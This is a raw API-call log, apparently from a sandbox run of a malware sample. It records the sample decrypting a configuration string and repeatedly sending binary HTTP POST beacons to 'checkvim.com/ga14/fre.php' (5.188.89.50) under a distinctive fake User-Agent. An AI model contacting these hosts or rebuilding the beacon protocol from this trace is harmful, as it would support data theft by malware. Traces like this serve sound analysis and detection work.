0x76a90000 [0296.510] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0296.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.511] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0296.511] GetProcessHeap () returned 0x840000 [0296.511] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0296.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.514] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0296.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.515] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0296.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.517] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0296.517] GetProcessHeap () returned 0x840000 [0296.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0296.517] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0296.519] GetProcessHeap () returned 0x840000 [0296.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0296.519] socket (af=2, type=1, protocol=6) returned 0x4bc [0296.519] connect (s=0x4bc, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0296.589] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0296.589] GetProcessHeap () returned 0x840000 [0296.589] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0296.589] GetProcessHeap () returned 0x840000 [0296.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0296.591] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0296.593] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0296.593] GetProcessHeap () returned 0x840000 [0296.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0296.593] GetProcessHeap () returned 0x840000 [0296.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0296.593] GetProcessHeap () returned 0x840000 [0296.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0296.593] GetProcessHeap () returned 0x840000 [0296.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0296.594] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0296.596] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0296.596] GetProcessHeap () returned 0x840000 [0296.596] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0296.596] GetProcessHeap () returned 0x840000 [0296.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0296.596] send (s=0x4bc, buf=0x873a58*, len=237, flags=0) returned 237 [0296.597] send (s=0x4bc, buf=0x87eb58*, len=159, flags=0) returned 159 [0296.597] GetProcessHeap () returned 0x840000 [0296.597] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0296.597] recv (in: s=0x4bc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0296.956] closesocket (s=0x4bc) returned 0 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0296.956] GetProcessHeap () returned 0x840000 [0296.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0296.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x588) returned 0x4bc [0296.958] Sleep (dwMilliseconds=0xea60) [0297.010] GetProcessHeap () returned 0x840000 [0297.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0297.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.011] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0297.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.018] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0297.062] GetProcessHeap () returned 0x840000 [0297.062] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0297.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.063] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0297.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.064] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0297.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.065] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.065] GetProcessHeap () returned 0x840000 [0297.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0297.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.066] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0297.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.066] CryptDestroyKey (hKey=0x87e870) returned 1 [0297.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.067] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0297.067] GetProcessHeap () returned 0x840000 [0297.067] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0297.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.076] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.076] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.077] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.078] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.078] GetProcessHeap () returned 0x840000 [0297.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0297.078] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0297.078] GetProcessHeap () returned 0x840000 [0297.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0297.078] GetProcessHeap () returned 0x840000 [0297.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0297.078] GetProcessHeap () returned 0x840000 [0297.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0297.078] GetProcessHeap () returned 0x840000 [0297.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0297.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.079] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0297.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.089] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0297.093] GetProcessHeap () returned 0x840000 [0297.093] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0297.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.094] CryptImportKey (in: hProv=0x86f248, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0297.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.095] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0297.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.096] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.096] GetProcessHeap () returned 0x840000 [0297.096] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0297.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.096] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0297.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.097] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0297.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.098] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0297.098] GetProcessHeap () returned 0x840000 [0297.098] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0297.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.101] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0297.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.102] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0297.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.102] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0297.103] GetProcessHeap () returned 0x840000 [0297.103] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0297.103] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0297.104] GetProcessHeap () returned 0x840000 [0297.104] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0297.104] socket (af=2, type=1, protocol=6) returned 0x4c0 [0297.104] connect (s=0x4c0, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0297.176] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0297.176] GetProcessHeap () returned 0x840000 [0297.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0297.176] GetProcessHeap () returned 0x840000 [0297.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0297.178] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0297.180] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0297.180] GetProcessHeap () returned 0x840000 [0297.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0297.180] GetProcessHeap () returned 0x840000 [0297.180] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0297.180] GetProcessHeap () returned 0x840000 [0297.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0297.180] GetProcessHeap () returned 0x840000 [0297.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0297.181] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0297.182] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0297.182] GetProcessHeap () returned 0x840000 [0297.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0297.182] GetProcessHeap () returned 0x840000 [0297.182] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0297.182] send (s=0x4c0, buf=0x873a58*, len=237, flags=0) returned 237 [0297.182] send (s=0x4c0, buf=0x87eb58*, len=159, flags=0) returned 159 [0297.182] GetProcessHeap () returned 0x840000 [0297.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0297.182] recv (in: s=0x4c0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0297.543] closesocket (s=0x4c0) returned 0 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0297.543] GetProcessHeap () returned 0x840000 [0297.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0297.543] GetProcessHeap () returned 0x840000 [0297.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0297.544] GetProcessHeap () returned 0x840000 [0297.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0297.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xd28) returned 0x4c0 [0297.545] Sleep (dwMilliseconds=0xea60) [0297.552] GetProcessHeap () returned 0x840000 [0297.552] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0297.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.553] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0297.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.559] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0297.566] GetProcessHeap () returned 0x840000 [0297.566] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0297.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.567] CryptImportKey (in: hProv=0x86f820, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0297.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.569] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0297.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.570] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.570] GetProcessHeap () returned 0x840000 [0297.570] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0297.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.571] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0297.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.572] CryptDestroyKey (hKey=0x87e970) returned 1 [0297.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.572] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0297.572] GetProcessHeap () returned 0x840000 [0297.573] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0297.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.573] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.575] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.576] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.577] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.577] GetProcessHeap () returned 0x840000 [0297.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0297.577] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0297.578] GetProcessHeap () returned 0x840000 [0297.578] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0297.578] GetProcessHeap () returned 0x840000 [0297.578] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0297.578] GetProcessHeap () returned 0x840000 [0297.578] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0297.578] GetProcessHeap () returned 0x840000 [0297.578] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0297.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.579] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0297.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.584] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0297.590] GetProcessHeap () returned 0x840000 [0297.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0297.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.591] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0297.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.591] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0297.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.592] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.592] GetProcessHeap () returned 0x840000 [0297.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0297.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.593] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0297.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.594] CryptDestroyKey (hKey=0x87e330) returned 1 [0297.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0297.595] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0297.595] GetProcessHeap () returned 0x840000 [0297.595] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0297.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.596] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0297.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.597] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0297.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.598] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0297.598] GetProcessHeap () returned 0x840000 [0297.598] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0297.598] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0297.602] GetProcessHeap () returned 0x840000 [0297.602] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0297.602] socket (af=2, type=1, protocol=6) returned 0x4c4 [0297.602] connect (s=0x4c4, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0297.671] 